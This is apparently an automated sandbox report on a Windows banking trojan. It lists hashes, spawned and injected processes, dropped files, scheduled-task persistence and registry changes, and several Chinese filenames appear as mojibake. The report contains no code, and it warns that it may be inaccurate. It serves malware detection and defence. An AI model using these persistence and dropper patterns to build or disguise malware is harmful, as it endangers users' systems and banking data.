Trojan.Win32.Badur.kict (Kaspersky), Trojan.Generic.12152654 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 41115417ce44a83fc6e4343f11f8e63d
SHA1: 53068ee320b3e8bec8c55544c8f2dda38cd1ee96
SHA256: 862fda1c753b2ec5f7c6fbf7545a6604a464bdac84f1d475c9bf3d865c6e63ff
SSDeep: 12288:7HR bnuGLydXXv42SGQ1O53mLjGsY4seAgZrnej6JKcXnf:7HRbGL2v42TQomC4saZDeGJJf
Size: 712704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-24 16:47:16
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088
The Trojan injects its code into the following process(es):
MM-liao8398.exe:824
dts.exe:1940
1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process yx_dts.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\´óÌìʹ֮½£.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\´óÌìʹ֮½£.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\öÃâ€ÃƒËœÃ‚´Ã³ÃŒÃ¬ÃŠÂ¹Ã–®½£.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\´óÌìʹ֮½£\´óÌìʹ֮½£.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (0 bytes)
The process MM-liao8398.exe:824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
The process %original file name%.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
The process notify.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
The process 9158chat2_ktv083_98.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (0 bytes)
The process assistupdate.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
The process dts.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (1234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (0 bytes)
The process dts.exe:1728 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (72 bytes)
The process dts.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (164 bytes)
The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp (0 bytes)
The process OfficeAssist.0419.80.1123.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\å¸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (0 bytes)
The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (0 bytes)
Registry activity
The process yx_dts.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"URLInfoAbout" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\´óÌìʹ֮½£]
"DisplayVersion" = "3.1.0.0"
"Publisher" = "´óÌìʹ֮½£"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
